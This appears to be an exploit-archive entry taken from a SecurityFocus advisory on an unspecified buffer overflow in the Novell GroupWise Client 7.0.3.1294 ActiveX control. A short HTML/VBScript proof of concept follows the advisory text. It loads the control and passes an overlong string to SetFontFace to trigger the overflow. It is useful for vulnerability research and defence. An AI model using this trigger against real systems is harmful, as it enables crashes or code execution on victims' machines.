27 lines
No EOL
840 B
HTML
27 lines
No EOL
840 B
HTML
source: https://www.securityfocus.com/bid/36398/info
|
|
|
|
Novell GroupWise Client is prone to an unspecified buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
|
|
|
|
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
|
|
|
|
Novell GroupWise Client 7.0.3.1294 is vulnerable; other versions may also be affected.
|
|
|
|
<html>
|
|
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667' id='GWComposeCtl'>
|
|
</object>
|
|
|
|
|
|
<script language='vbscript'>
|
|
|
|
|
|
|
|
|
|
argCount = 1
|
|
|
|
|
|
arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAA"
|
|
|
|
GWComposeCtl.SetFontFace arg1
|
|
|
|
</script> |